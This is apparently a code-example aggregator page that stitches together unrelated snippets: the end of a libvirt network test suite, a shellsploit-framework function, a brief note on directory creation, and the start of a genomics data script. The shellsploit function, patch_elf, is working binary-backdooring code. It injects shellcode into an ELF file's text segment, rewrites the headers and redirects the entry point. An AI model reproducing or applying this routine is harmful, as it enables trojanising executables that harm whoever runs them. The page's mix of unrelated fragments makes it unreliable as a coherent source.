                tc_burst = int(se.group(2))
            assert tc_burst == int(bandwidth["burst"])

    def check_host_routes():
        """
        Check network routes on host
        """
        for rt in routes:
            try:
                route = ast.literal_eval(rt)
                addr = "%s/%s" % (route["address"], route["prefix"])
                cmd = "ip route list %s" % addr
                if route.has_key("family") and route["family"] == "ipv6":
                    cmd = "ip -6 route list %s" % addr
                output = utils.run(cmd).stdout
                match_obj = re.search(r"via (\S+).*metric (\d+)", output)
                if match_obj:
                    via_addr = match_obj.group(1)
                    metric = match_obj.group(2)
                    logging.debug("via address %s for %s, matric is %s"
                                  % (via_addr, addr, metric))
                    assert via_addr == route["gateway"]
                    if route.has_key("metric"):
                        assert metric == route["metric"]
            except KeyError:
                pass

    def run_bandwidth_test(check_net=False, check_iface=False):
        """
        Test bandwidth option for network or interface by tc command.
        """
        iface_inbound = ast.literal_eval(iface_bandwidth_inbound)
        iface_outbound = ast.literal_eval(iface_bandwidth_outbound)
        net_inbound = ast.literal_eval(net_bandwidth_inbound)
        net_outbound = ast.literal_eval(net_bandwidth_outbound)
        net_bridge_name = ast.literal_eval(net_bridge)["name"]
        iface_name = libvirt.get_ifname_host(vm_name, iface_mac)

        try:
            if check_net and net_inbound:
                # Check qdisc rules
                cmd = "tc -d qdisc show dev %s" % net_bridge_name
                qdisc_output = utils.run(cmd).stdout
                logging.debug("Bandwidth qdisc output: %s", qdisc_output)
                if not qdisc_output.count("qdisc ingress ffff:"):
                    raise error.TestFail("Can't find ingress setting")
                check_class_rules(net_bridge_name, "1:1",
                                  {"average": net_inbound["average"],
                                   "peak": net_inbound["peak"]})
                check_class_rules(net_bridge_name, "1:2", net_inbound)

            # Check filter rules on bridge interface
            if check_net and net_outbound:
                check_filter_rules(net_bridge_name, net_outbound)

            # Check class rules on interface inbound settings
            if check_iface and iface_inbound:
                check_class_rules(iface_name, "1:1",
                                  {'average': iface_inbound['average'],
                                   'peak': iface_inbound['peak'],
                                   'burst': iface_inbound['burst']})
                if iface_inbound.has_key("floor"):
                    if not libvirt_version.version_compare(1, 0, 1):
                        raise error.TestNAError("Not supported Qos"
                                                " options 'floor'")

                    check_class_rules(net_bridge_name, "1:3",
                                      {'floor': iface_inbound["floor"]})

            # Check filter rules on interface outbound settings
            if check_iface and iface_outbound:
                check_filter_rules(iface_name, iface_outbound)
        except AssertionError:
            utils.log_last_traceback()
            raise error.TestFail("Failed to check network bandwidth")

    def check_name_ip(session):
        """
        Check dns resolving on guest
        """
        # Check if bind-utils is installed
        if not utils_misc.yum_install(['bind-utils'], session):
            raise error.TestError("Failed to install bind-utils"
                                  " on guest")
        # Run host command to check if hostname can be resolved
        if not guest_ipv4 and not guest_ipv6:
            raise error.TestFail("No ip address found from parameters")
        guest_ip = guest_ipv4 if guest_ipv4 else guest_ipv6
        cmd = "host %s | grep %s" % (guest_name, guest_ip)
        if session.cmd_status(cmd):
            raise error.TestFail("Can't resolve name %s on guest" %
                                 guest_name)

    def check_ipt_rules(check_ipv4=True, check_ipv6=False):
        """
        Check iptables for network/interface
        """
        br_name = ast.literal_eval(net_bridge)["name"]
        net_forward = ast.literal_eval(params.get("net_forward", "{}"))
        net_ipv4 = params.get("net_ipv4")
        net_ipv6 = params.get("net_ipv6")
        ipt_rules = ("FORWARD -i {0} -o {0} -j ACCEPT".format(br_name),
                     "FORWARD -o %s -j REJECT --reject-with icmp" % br_name,
                     "FORWARD -i %s -j REJECT --reject-with icmp" % br_name)
        net_dev_in = ""
        net_dev_out = ""
        if net_forward.has_key("dev"):
            net_dev_in = " -i %s" % net_forward["dev"]
            net_dev_out = " -o %s" % net_forward["dev"]
        if check_ipv4:
            ipv4_rules = list(ipt_rules)
            ctr_rule = ""
            nat_rules = []
            if net_forward.has_key("mode") and net_forward["mode"] == "nat":
                nat_port = ast.literal_eval(params.get("nat_port"))
                p_start = nat_port["start"]
                p_end = nat_port["end"]
                ctr_rule = " -m .* RELATED,ESTABLISHED"
                nat_rules = [("POSTROUTING -s {0} ! -d {0} -p tcp -j MASQUERADE"
                              " --to-ports {1}-{2}".format(net_ipv4, p_start, p_end)),
                             ("POSTROUTING -s {0} ! -d {0} -p udp -j MASQUERADE"
                              " --to-ports {1}-{2}".format(net_ipv4, p_start, p_end)),
                             ("POSTROUTING -s {0} ! -d {0} -p udp"
                              " -j MASQUERADE".format(net_ipv4))]
            if nat_rules:
                ipv4_rules.extend(nat_rules)
            if (net_ipv4 and net_forward.has_key("mode") and
                    net_forward["mode"] in ["nat", "route"]):
                rules = [("FORWARD -d %s%s -o %s%s -j ACCEPT"
                          % (net_ipv4, net_dev_in, br_name, ctr_rule)),
                         ("FORWARD -s %s -i %s%s -j ACCEPT"
                          % (net_ipv4, br_name, net_dev_out))]
                ipv4_rules.extend(rules)

            output = utils.run("iptables-save").stdout.strip()
            logging.debug("iptables: %s", output)
            for ipt in ipv4_rules:
                if not re.findall(r"%s" % ipt, output, re.M):
                    raise error.TestFail("Can't find iptable rule:\n%s" % ipt)
        if check_ipv6:
            ipv6_rules = list(ipt_rules)
            if (net_ipv6 and net_forward.has_key("mode") and
                    net_forward["mode"] in ["nat", "route"]):
                rules = [("FORWARD -d %s%s -o %s -j ACCEPT"
                          % (net_ipv6, net_dev_in, br_name)),
                         ("FORWARD -s %s -i %s%s -j ACCEPT"
                          % (net_ipv6, br_name, net_dev_out))]
                ipv6_rules.extend(rules)
            output = utils.run("ip6tables-save").stdout.strip()
            logging.debug("iptables: %s", output)
            for ipt in ipv6_rules:
                if not output.count(ipt):
                    raise error.TestFail("Can't find ipbtable rule:\n%s" % ipt)

    def run_ip_test(session, ip_ver):
        """
        Check iptables on host and ipv6 address on guest
        """
        if ip_ver == "ipv6":
            # Clean up iptables rules for guest to get ipv6 address
            session.cmd_status("ip6tables -F")

        # It may take some time to get the ip address
        def get_ip_func():
            return utils_net.get_guest_ip_addr(session, iface_mac,
                                               ip_version=ip_ver)
        utils_misc.wait_for(get_ip_func, 5)
        if not get_ip_func():
            utils_net.restart_guest_network(session, iface_mac,
                                            ip_version=ip_ver)
            utils_misc.wait_for(get_ip_func, 5)
        vm_ip = get_ip_func()
        logging.debug("Guest has ip: %s", vm_ip)
        if not vm_ip:
            raise error.TestFail("Can't find ip address on guest")
        ip_gateway = net_ip_address
        if ip_ver == "ipv6":
            ip_gateway = net_ipv6_address
            # Clean up ip6tables on host for ping6 test
            utils.run("ip6tables -F")
        if ip_gateway and not routes:
            ping_s, _ = ping(dest=ip_gateway, count=5,
                             timeout=10, session=session)
            if ping_s:
                raise error.TestFail("Failed to ping gateway address: %s"
                                     % ip_gateway)

    def run_guest_libvirt(session):
        """
        Check guest libvirt network
        """
        # Try to install required packages
        if not utils_misc.yum_install(['libvirt'], session):
            raise error.TestError("Failed ot install libvirt"
                                  " package on guest")
        result = True
        # Try to load tun module first
        session.cmd("lsmod | grep tun || modprobe  tun")
        # Check network state on guest
        cmd = ("service libvirtd restart; virsh net-info default"
               " | grep 'Active:.*no'")
        if session.cmd_status(cmd):
            result = False
            logging.error("Default network isn't in inactive state")
        # Try to start default network on guest, check error messages
        if result:
            cmd = "virsh net-start default"
            status, output = session.cmd_status_output(cmd)
            logging.debug("Run command on guest exit %s, output %s"
                          % (status, output))
            if not status or not output.count("already in use"):
                result = False
                logging.error("Failed to see network messges on guest")
        if session.cmd_status("yum -y remove libvirt*"):
            logging.error("Failed to remove libvirt packages on guest")

        if not result:
            raise error.TestFail("Check libvirt network on guest failed")

    start_error = "yes" == params.get("start_error", "no")
    define_error = "yes" == params.get("define_error", "no")
    restart_error = "yes" == params.get("restart_error", "no")

    # network specific attributes.
    net_name = params.get("net_name", "default")
    net_bridge = params.get("net_bridge", "{'name':'virbr0'}")
    net_domain = params.get("net_domain")
    net_ip_address = params.get("net_ip_address")
    net_ipv6_address = params.get("net_ipv6_address")
    net_dns_forward = params.get("net_dns_forward")
    net_dns_txt = params.get("net_dns_txt")
    net_dns_srv = params.get("net_dns_srv")
    net_dns_hostip = params.get("net_dns_hostip")
    net_dns_hostnames = params.get("net_dns_hostnames", "").split()
    dhcp_start_ipv4 = params.get("dhcp_start_ipv4")
    dhcp_end_ipv4 = params.get("dhcp_end_ipv4")
    guest_name = params.get("guest_name")
    guest_ipv4 = params.get("guest_ipv4")
    guest_ipv6 = params.get("guest_ipv6")
    tftp_root = params.get("tftp_root")
    pxe_boot = "yes" == params.get("pxe_boot", "no")
    routes = params.get("routes", "").split()
    net_bandwidth_inbound = params.get("net_bandwidth_inbound", "{}")
    net_bandwidth_outbound = params.get("net_bandwidth_outbound", "{}")
    iface_bandwidth_inbound = params.get("iface_bandwidth_inbound", "{}")
    iface_bandwidth_outbound = params.get("iface_bandwidth_outbound", "{}")
    iface_num = params.get("iface_num", "1")
    iface_source = params.get("iface_source", "{}")
    multiple_guests = params.get("multiple_guests")
    create_network = "yes" == params.get("create_network", "no")
    attach_iface = "yes" == params.get("attach_iface", "no")
    serial_login = "yes" == params.get("serial_login", "no")
    change_iface_option = "yes" == params.get("change_iface_option", "no")
    test_bridge = "yes" == params.get("test_bridge", "no")
    test_dnsmasq = "yes" == params.get("test_dnsmasq", "no")
    test_dhcp_range = "yes" == params.get("test_dhcp_range", "no")
    test_dns_host = "yes" == params.get("test_dns_host", "no")
    test_qos_bandwidth = "yes" == params.get("test_qos_bandwidth", "no")
    test_pg_bandwidth = "yes" == params.get("test_portgroup_bandwidth", "no")
    test_qos_remove = "yes" == params.get("test_qos_remove", "no")
    test_ipv4_address = "yes" == params.get("test_ipv4_address", "no")
    test_ipv6_address = "yes" == params.get("test_ipv6_address", "no")
    test_guest_libvirt = "yes" == params.get("test_guest_libvirt", "no")
    username = params.get("username")
    password = params.get("password")

    # Destroy VM first
    if vm.is_alive():
        vm.destroy(gracefully=False)

    # Back up xml file.
    netxml_backup = NetworkXML.new_from_net_dumpxml("default")
    iface_mac = vm_xml.VMXML.get_first_mac_by_name(vm_name)
    params["guest_mac"] = iface_mac
    vmxml_backup = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
    vms_list = []
    if "floor" in ast.literal_eval(iface_bandwidth_inbound):
        if not libvirt_version.version_compare(1, 0, 1):
            raise error.TestNAError("Not supported Qos"
                                    " options 'floor'")

    # Build the xml and run test.
    try:
        if test_dnsmasq:
            # Check the settings before modifying network xml
            if net_dns_forward == "no":
                run_dnsmasq_default_test("domain-needed", exists=False)
                run_dnsmasq_default_test("local", "//", exists=False)
            if net_domain:
                run_dnsmasq_default_test("domain", net_domain, exists=False)
                run_dnsmasq_default_test("expand-hosts", exists=False)

        # Prepare pxe boot directory
        if pxe_boot:
            prepare_pxe_boot()
        # Edit the network xml or create a new one.
        if create_network:
            net_ifs = utils_net.get_net_if(state="UP")
            # Check whether the forward device is valid; if it is not in
            # the host interface list, fall back to the first active
            # interface of the host
            forward = ast.literal_eval(params.get("net_forward",
                                                  "{}"))
            if (forward.has_key('mode') and forward['mode'] in
                ['passthrough', 'private', 'bridge', 'macvtap'] and
                forward.has_key('dev') and
                    forward['dev'] not in net_ifs):
                logging.warn("Forward device %s is not a interface"
                             " of host, reset to %s",
                             forward['dev'], net_ifs[0])
                forward['dev'] = net_ifs[0]
                params["net_forward"] = str(forward)
            forward_iface = params.get("forward_iface")
            if forward_iface:
                interface = [x for x in forward_iface.split()]
                # The guest will use the first interface of the list;
                # check whether it is valid, and if it is not in the
                # host interface list, fall back to the first active
                # interface of the host.
                if interface[0] not in net_ifs:
                    logging.warn("Forward interface %s is not a "
                                 " interface of host, reset to %s",
                                 interface[0], net_ifs[0])
                    interface[0] = net_ifs[0]
                    params["forward_iface"] = " ".join(interface)

            netxml = libvirt.create_net_xml(net_name, params)
            try:
                netxml.sync()
            except xcepts.LibvirtXMLError, details:
                logging.info(str(details))
                if define_error:
                    pass
                else:
                    raise error.TestFail("Failed to define network")
        # Edit the interface xml.
        if change_iface_option:
            modify_iface_xml()
        # Attach interface if needed
        if attach_iface:
            iface_type = params.get("iface_type", "network")
            iface_model = params.get("iface_model", "virtio")
            for i in range(int(iface_num)):
                logging.info("Try to attach interface loop %s" % i)
                options = ("%s %s --model %s --config" %
                           (iface_type, net_name, iface_model))
                ret = virsh.attach_interface(vm_name, options,
                                             ignore_status=True)
                if ret.exit_status:
                    logging.error("Command output %s" %
                                  ret.stdout.strip())
                    raise error.TestFail("Failed to attach-interface")

        if multiple_guests:
            # Clone more vms for testing
            for i in range(int(multiple_guests)):
                guest_name = "%s_%s" % (vm_name, i)
                timeout = params.get("clone_timeout", 360)
                utils_libguestfs.virt_clone_cmd(vm_name, guest_name,
                                                True, timeout=timeout)
                vms_list.append(vm.clone(guest_name))

        if test_bridge:
            bridge = ast.literal_eval(net_bridge)
            br_if = utils_net.Interface(bridge['name'])
            if not br_if.is_up():
                raise error.TestFail("Bridge interface isn't up")
        if test_dnsmasq:
            # Check the settings in dnsmasq config file
            if net_dns_forward == "no":
                run_dnsmasq_default_test("domain-needed")
                run_dnsmasq_default_test("local", "//")
            if net_domain:
                run_dnsmasq_default_test("domain", net_domain)
                run_dnsmasq_default_test("expand-hosts")
            if net_bridge:
                bridge = ast.literal_eval(net_bridge)
                run_dnsmasq_default_test("interface", bridge['name'])
                if bridge.has_key('stp') and bridge['stp'] == 'on':
                    if bridge.has_key('delay'):
                        br_delay = float(bridge['delay'])
                        cmd = ("brctl showstp %s | grep 'bridge forward delay'"
                               % bridge['name'])
                        out = utils.run(cmd, ignore_status=False).stdout.strip()
                        logging.debug("brctl showstp output: %s", out)
                        pattern = (r"\s*forward delay\s+(\d+.\d+)\s+bridge"
                                   " forward delay\s+(\d+.\d+)")
                        match_obj = re.search(pattern, out, re.M)
                        if not match_obj or len(match_obj.groups()) != 2:
                            raise error.TestFail("Can't see forward delay"
                                                 " messages from command")
                        elif (float(match_obj.groups()[0]) != br_delay or
                                float(match_obj.groups()[1]) != br_delay):
                            raise error.TestFail("Foward delay setting"
                                                 " can't take effect")
            if dhcp_start_ipv4 and dhcp_end_ipv4:
                run_dnsmasq_default_test("dhcp-range", "%s,%s"
                                         % (dhcp_start_ipv4, dhcp_end_ipv4))
            if guest_name and guest_ipv4:
                run_dnsmasq_host_test(iface_mac, guest_ipv4, guest_name)

        if test_dns_host:
            if net_dns_txt:
                dns_txt = ast.literal_eval(net_dns_txt)
                run_dnsmasq_default_test("txt-record", "%s,%s" %
                                         (dns_txt["name"],
                                          dns_txt["value"]))
            if net_dns_srv:
                dns_srv = ast.literal_eval(net_dns_srv)
                run_dnsmasq_default_test("srv-host", "_%s._%s.%s,%s,%s,%s,%s" %
                                         (dns_srv["service"], dns_srv["protocol"],
                                          dns_srv["domain"], dns_srv["target"],
                                          dns_srv["port"], dns_srv["priority"],
                                          dns_srv["weight"]))
            if net_dns_hostip and net_dns_hostnames:
                run_dnsmasq_addnhosts_test(net_dns_hostip, net_dns_hostnames)

        # Run bandwidth test for network
        if test_qos_bandwidth:
            run_bandwidth_test(check_net=True)
        # Check routes if needed
        if routes:
            check_host_routes()

        try:
            # Start the VM.
            vm.start()
            if start_error:
                raise error.TestFail("VM started unexpectedly")
            if pxe_boot:
                # Just check network boot messages here
                vm.serial_console.read_until_output_matches(
                    ["Loading vmlinuz", "Loading initrd.img"],
                    utils_misc.strip_console_codes)
                output = vm.serial_console.get_stripped_output()
                logging.debug("Boot messages: %s", output)

            else:
                if serial_login:
                    session = vm.wait_for_serial_login(username=username,
                                                       password=password)
                else:
                    session = vm.wait_for_login()

                if test_dhcp_range:
                    dhcp_range = int(params.get("dhcp_range", "252"))
                    utils_net.restart_guest_network(session, iface_mac)
                    vm_ip = utils_net.get_guest_ip_addr(session, iface_mac)
                    logging.debug("Guest has ip: %s", vm_ip)
                    if not vm_ip and dhcp_range:
                        raise error.TestFail("Guest has invalid ip address")
                    elif vm_ip and not dhcp_range:
                        raise error.TestFail("Guest has ip address: %s"
                                             % vm_ip)
                    dhcp_range = dhcp_range - 1
                    for vms in vms_list:
                        # Start other VMs.
                        vms.start()
                        sess = vms.wait_for_serial_login()
                        vms_mac = vms.get_virsh_mac_address()
                        # restart guest network to get ip addr
                        utils_net.restart_guest_network(sess, vms_mac)
                        vms_ip = utils_net.get_guest_ip_addr(sess,
                                                             vms_mac)
                        if not vms_ip and dhcp_range:
                            raise error.TestFail("Guest has invalid ip address")
                        elif vms_ip and not dhcp_range:
                            # Get IP address on guest should return Null
                            # if it exceeds the dhcp range
                            raise error.TestFail("Guest has ip address: %s"
                                                 % vms_ip)
                        dhcp_range = dhcp_range - 1
                        if vms_ip:
                            ping_s, _ = ping(dest=vm_ip, count=5,
                                             timeout=10, session=sess)
                            if ping_s:
                                raise error.TestFail("Failed to ping, src: %s, "
                                                     "dst: %s" % (vms_ip, vm_ip))
                        sess.close()

                # Check if dnsmasq settings take effect in guest
                if guest_ipv4:
                    check_name_ip(session)

                # Run bandwidth test for interface
                if test_qos_bandwidth:
                    run_bandwidth_test(check_iface=True)
                # Run bandwidth test for portgroup
                if test_pg_bandwidth:
                    pg_bandwidth_inbound = params.get(
                        "portgroup_bandwidth_inbound", "").split()
                    pg_bandwidth_outbound = params.get(
                        "portgroup_bandwidth_outbound", "").split()
                    pg_name = params.get("portgroup_name", "").split()
                    pg_default = params.get("portgroup_default", "").split()
                    iface_inbound = ast.literal_eval(iface_bandwidth_inbound)
                    iface_outbound = ast.literal_eval(iface_bandwidth_outbound)
                    iface_name = libvirt.get_ifname_host(vm_name, iface_mac)
                    if_source = ast.literal_eval(iface_source)
                    if "portgroup" in if_source:
                        pg = if_source["portgroup"]
                    else:
                        pg = "default"
                    for (name, df, bw_ib, bw_ob) in zip(pg_name, pg_default,
                                                        pg_bandwidth_inbound,
                                                        pg_bandwidth_outbound):
                        if pg == name:
                            inbound = ast.literal_eval(bw_ib)
                            outbound = ast.literal_eval(bw_ob)
                        elif pg == "default" and df == "yes":
                            inbound = ast.literal_eval(bw_ib)
                            outbound = ast.literal_eval(bw_ob)
                        else:
                            continue
                        # Interface bandwidth settings will
                        # override portgroup settings
                        if iface_inbound:
                            inbound = iface_inbound
                        if iface_outbound:
                            outbound = iface_outbound
                        check_class_rules(iface_name, "1:1", inbound)
                        check_filter_rules(iface_name, outbound)
                if test_qos_remove:
                    # Remove the bandwidth settings in network xml
                    logging.debug("Removing network bandwidth settings...")
                    netxml_backup.sync()
                    vm.destroy(gracefully=False)
                    # Should fail to start vm
                    vm.start()
                    if restart_error:
                        raise error.TestFail("VM started unexpectedly")
                if test_ipv6_address:
                    check_ipt_rules(check_ipv6=True)
                    run_ip_test(session, "ipv6")
                if test_ipv4_address:
                    check_ipt_rules(check_ipv4=True)
                    run_ip_test(session, "ipv4")

                if test_guest_libvirt:
                    run_guest_libvirt(session)

                session.close()
        except virt_vm.VMStartError as details:
            logging.info(str(details))
            if not (start_error or restart_error):
                raise error.TestFail('VM failed to start:\n%s' % details)

    finally:
        # Recover VM.
        if vm.is_alive():
            vm.destroy(gracefully=False)
        for vms in vms_list:
            virsh.remove_domain(vms.name, "--remove-all-storage")
        logging.info("Restoring network...")
        if net_name == "default":
            netxml_backup.sync()
        else:
            # Destroy and undefine new created network
            virsh.net_destroy(net_name)
            virsh.net_undefine(net_name)
        vmxml_backup.sync()

Example 120

Project: shellsploit-framework
Source File: elfbin.py
View license
    def patch_elf(self):
        '''
        Circa 1998: http://vxheavens.com/lib/vsc01.html  <--Thanks to elfmaster
        1. Locate the text segment program header
            -Modify the entry point of the ELF header to point to the new code (p_vaddr + p_filesz)
            -Increase p_filesz to account for the new code (parasite)
            -Increase p_memsz to account for the new code (parasite)
        2. For each phdr whose segment is after the insertion (text segment)
            -increase p_offset by PAGE_SIZE
        3. For the last shdr in the text segment
            -increase sh_len by the parasite length
        4. For each shdr whose section resides after the insertion
            -Increase sh_offset by PAGE_SIZE
        5. Physically insert the new code (parasite) and pad to PAGE_SIZE,
            into the file - text segment p_offset + p_filesz (original)
        6. Increase e_shoff by PAGE_SIZE in the ELF header
        7. Patch the insertion code (parasite) to jump to the original entry point
        '''

        self.support_check()
        if self.supported is False:
            print "[!] ELF Binary not supported"
            return False

        self.output_options()

        if not os.path.exists("backdoored"):
            os.makedirs("backdoored")
        os_name = os.name
        if os_name == 'nt':
            self.backdoorfile = "backdoored\\" + self.OUTPUT
        else:
            self.backdoorfile = "backdoored/" + self.OUTPUT

        shutil.copy2(self.FILE, self.backdoorfile)


        gather_result = self.gather_file_info()
        if gather_result is False:
            print "[!] Are you fuzzing?"
            return False

        print "[*] Getting shellcode length"

        resultShell = self.set_shells()
        if resultShell is False:
            print "[!] Could not set shell"
            return False
        self.bin_file = open(self.backdoorfile, "r+b")

        newBuffer = len(self.shellcode)

        self.bin_file.seek(24, 0)

        headerTracker = 0x0
        PAGE_SIZE = 4096
        newOffset = None
        #find range of the first PT_LOAD section
        for header, values in self.prog_hdr.iteritems():
            #print 'program header', header, values
            if values['p_flags'] == 0x5 and values['p_type'] == 0x1:
                #print "Found text segment"
                self.shellcode_vaddr = values['p_vaddr'] + values['p_filesz']
                beginOfSegment = values['p_vaddr']
                oldentry = self.e_entry
                sizeOfNewSegment = values['p_memsz'] + newBuffer
                LOCofNewSegment = values['p_filesz'] + newBuffer
                headerTracker = header
                newOffset = values['p_offset'] + values['p_filesz']

        # now that we have the shellcode start point, reassign the shellcode;
        #  there is no change in size
        print "[*] Setting selected shellcode"

        resultShell = self.set_shells()

        #SPLIT THE FILE
        self.bin_file.seek(0)
        if newOffset > 4294967296 or newOffset is None:
            print "[!] Fuzz Fuzz Fuzz the bin"
            return False
        if newOffset > self.file_size:
            print "[!] The file is really not that big"
            return False

        file_1st_part = self.bin_file.read(newOffset)
        #print file_1st_part.encode('hex')
        newSectionOffset = self.bin_file.tell()
        file_2nd_part = self.bin_file.read()

        self.bin_file.close()
        #print "Reopen file for adjustments"
        self.bin_file = open(self.backdoorfile, "w+b")
        self.bin_file.write(file_1st_part)
        self.bin_file.write(self.shellcode)
        self.bin_file.write("\x00" * (PAGE_SIZE - len(self.shellcode)))
        self.bin_file.write(file_2nd_part)
        if self.EI_CLASS == 0x01:
            #32 bit FILE
            #update section header table
            print "[*] Patching x86 Binary"
            self.bin_file.seek(24, 0)
            self.bin_file.seek(8, 1)
            if self.e_shoff + PAGE_SIZE > 4294967296:
                print "[!] Such fuzz..."
                return False
            self.bin_file.write(struct.pack(self.endian + "I", self.e_shoff + PAGE_SIZE))
            self.bin_file.seek(self.e_shoff + PAGE_SIZE, 0)
            for i in range(self.e_shnum):
                #print "i", i, self.sec_hdr[i]['sh_offset'], newOffset
                if self.sec_hdr[i]['sh_offset'] >= newOffset:
                    #print "Adding page size"
                    if self.sec_hdr[i]['sh_offset'] + PAGE_SIZE > 4294967296:
                        print "[!] Melkor is cool right?"
                        return False
                    self.bin_file.seek(16, 1)
                    self.bin_file.write(struct.pack(self.endian + "I", self.sec_hdr[i]['sh_offset'] + PAGE_SIZE))
                    self.bin_file.seek(20, 1)
                elif self.sec_hdr[i]['sh_size'] + self.sec_hdr[i]['sh_addr'] == self.shellcode_vaddr:
                    #print "adding newBuffer size"
                    if self.sec_hdr[i]['sh_offset'] + newBuffer > 4294967296:
                        print "[!] Someone is fuzzing..."
                        return False
                    self.bin_file.seek(20, 1)
                    self.bin_file.write(struct.pack(self.endian + "I", self.sec_hdr[i]['sh_size'] + newBuffer))
                    self.bin_file.seek(16, 1)
                else:
                    self.bin_file.seek(40, 1)
            #update the pointer to the section header table
            after_textSegment = False
            self.bin_file.seek(self.e_phoff, 0)
            for i in range(self.e_phnum):
                #print "header range i", i
                #print "self.shellcode_vaddr", hex(self.prog_hdr[i]['p_vaddr']), hex(self.shellcode_vaddr)
                if i == headerTracker:
                    #print "Found Text Segment again"
                    after_textSegment = True
                    self.bin_file.seek(16, 1)

                    if self.prog_hdr[i]['p_filesz'] + newBuffer > 4294967296:
                        print "[!] Melkor you fuzzer you..."
                        return False
                    if self.prog_hdr[i]['p_memsz'] + newBuffer > 4294967296:
                        print "[!] Someone is a fuzzing..."
                        return False
                    self.bin_file.write(struct.pack(self.endian + "I", self.prog_hdr[i]['p_filesz'] + newBuffer))
                    self.bin_file.write(struct.pack(self.endian + "I", self.prog_hdr[i]['p_memsz'] + newBuffer))
                    self.bin_file.seek(8, 1)
                elif after_textSegment is True:
                    #print "Increasing headers after the addition"
                    self.bin_file.seek(4, 1)
                    if self.prog_hdr[i]['p_offset'] + PAGE_SIZE > 4294967296:
                        print "[!] Nice Fuzzer!"
                        return False
                    self.bin_file.write(struct.pack(self.endian + "I", self.prog_hdr[i]['p_offset'] + PAGE_SIZE))
                    self.bin_file.seek(24, 1)
                else:
                    self.bin_file.seek(32, 1)

            self.bin_file.seek(self.e_entryLocOnDisk, 0)
            if self.shellcode_vaddr >= 4294967295:
                print "[!] Oh hai Fuzzer!"
                return False
            self.bin_file.write(struct.pack(self.endian + "I", self.shellcode_vaddr))

            self.JMPtoCodeAddress = self.shellcode_vaddr - self.e_entry - 5

        else:
            #64 bit FILE
            print "[*] Patching x64 Binary"
            self.bin_file.seek(24, 0)
            self.bin_file.seek(16, 1)
            if self.e_shoff + PAGE_SIZE > 0x7fffffffffffffff:
                print "[!] Such fuzz..."
                return False
            self.bin_file.write(struct.pack(self.endian + "I", self.e_shoff + PAGE_SIZE))
            self.bin_file.seek(self.e_shoff + PAGE_SIZE, 0)
            for i in range(self.e_shnum):
                #print "i", i, self.sec_hdr[i]['sh_offset'], newOffset
                if self.sec_hdr[i]['sh_offset'] >= newOffset:
                    #print "Adding page size"
                    self.bin_file.seek(24, 1)
                    if self.sec_hdr[i]['sh_offset'] + PAGE_SIZE > 0x7fffffffffffffff:
                        print "[!] Fuzzing..."
                        return False
                    self.bin_file.write(struct.pack(self.endian + "Q", self.sec_hdr[i]['sh_offset'] + PAGE_SIZE))
                    self.bin_file.seek(32, 1)
                elif self.sec_hdr[i]['sh_size'] + self.sec_hdr[i]['sh_addr'] == self.shellcode_vaddr:
                    #print "adding newBuffer size"
                    self.bin_file.seek(32, 1)
                    if self.sec_hdr[i]['sh_offset'] + newBuffer > 0x7fffffffffffffff:
                        print "[!] Melkor is cool right?"
                        return False
                    self.bin_file.write(struct.pack(self.endian + "Q", self.sec_hdr[i]['sh_size'] + newBuffer))
                    self.bin_file.seek(24, 1)
                else:
                    self.bin_file.seek(64, 1)
            #update the pointer to the section header table
            after_textSegment = False
            self.bin_file.seek(self.e_phoff, 0)
            for i in range(self.e_phnum):
                #print "header range i", i
                #print "self.shellcode_vaddr", hex(self.prog_hdr[i]['p_vaddr']), hex(self.shellcode_vaddr)
                if i == headerTracker:
                    #print "Found Text Segment again"
                    after_textSegment = True
                    self.bin_file.seek(32, 1)
                    if self.prog_hdr[i]['p_filesz'] + newBuffer > 0x7fffffffffffffff:
                        print "[!] Fuzz fuzz fuzz... "
                        return False
                    if self.prog_hdr[i]['p_memsz'] + newBuffer > 0x7fffffffffffffff:
                        print "[!] Someone is fuzzing..."
                        return False
                    self.bin_file.write(struct.pack(self.endian + "Q", self.prog_hdr[i]['p_filesz'] + newBuffer))
                    self.bin_file.write(struct.pack(self.endian + "Q", self.prog_hdr[i]['p_memsz'] + newBuffer))
                    self.bin_file.seek(8, 1)
                elif after_textSegment is True:
                    #print "Increasing headers after the addition"
                    self.bin_file.seek(8, 1)
                    if self.prog_hdr[i]['p_offset'] + PAGE_SIZE > 0x7fffffffffffffff:
                        print "[!] Nice fuzzer!"
                        return False
                    self.bin_file.write(struct.pack(self.endian + "Q", self.prog_hdr[i]['p_offset'] + PAGE_SIZE))
                    self.bin_file.seek(40, 1)
                else:
                    self.bin_file.seek(56, 1)

            self.bin_file.seek(self.e_entryLocOnDisk, 0)
            if self.shellcode_vaddr > 0x7fffffffffffffff:
                print "[!] Fuzzing..."
                return False
            self.bin_file.write(struct.pack(self.endian + "Q", self.shellcode_vaddr))

            self.JMPtoCodeAddress = self.shellcode_vaddr - self.e_entry - 5

        self.bin_file.close()
        print "[!] Patching Complete"
        return True
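
A note on the os.path.exists call above: patch_elf only creates the "backdoored" directory when it is missing and then joins the output path by hand for each OS. A minimal sketch of the same idea, assuming nothing beyond the standard library (the helper name and file name are illustrative, not part of shellsploit-framework), which also tolerates the race where the directory appears between the check and makedirs:

import errno
import os

def ensure_output_path(dirname, filename):
    # Create the directory only if it does not exist yet.
    if not os.path.exists(dirname):
        try:
            os.makedirs(dirname)
        except OSError as exc:
            # Another process may have created it after the exists() check.
            if exc.errno != errno.EEXIST:
                raise
    # os.path.join picks the correct separator, so no os.name branching is needed.
    return os.path.join(dirname, filename)

backdoorfile = ensure_output_path("backdoored", "patched.bin")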

Example 121

Project: FIDDLE
Source File: data4trainng.py
View license
def main():
    usage = 'usage: %prog [options] <assembly> <annotation_file> <out_file>'
    parser = OptionParser(usage)
    parser.add_option('-d', dest='rootDir', type='str', default='.', help='Root directory of the project [Default: %default]')
    parser.add_option('-b', dest='chunkSize', default=1000, type='int', help='Align sizes with batch size')
    parser.add_option('-e', dest='width', type='int', default=500, help='Extend all sequences to this length [Default: %default]')
    parser.add_option('-r', dest='stride', default=20, type='int', help='Stride sequences [Default: %default]')

    (options,args) = parser.parse_args()

    if len(args) !=3 :
        print(args)
        print(options)
        print(len(args))
        parser.error('Must provide assembly, annotation file and an output name')
    else:
        assembly = args[0]
        annot_file = args[1]
        out_file = args[2]

    # read in the annotation file
    annot = pd.read_table(annot_file,sep=',')

    # Make directory for the project
    directory = "../../data/hdf5datasets/"
    if not os.path.exists(directory):
        os.makedirs(directory)

    # Parameters
    x1 = 500  #upstream
    x2 = 500  #downstream

    # open the hdf5 file to write
    f = h5py.File(os.path.join(directory,out_file), "w")
    trainSize = np.floor(0.90*len(annot)*(x1+x2-options.width)/options.stride)
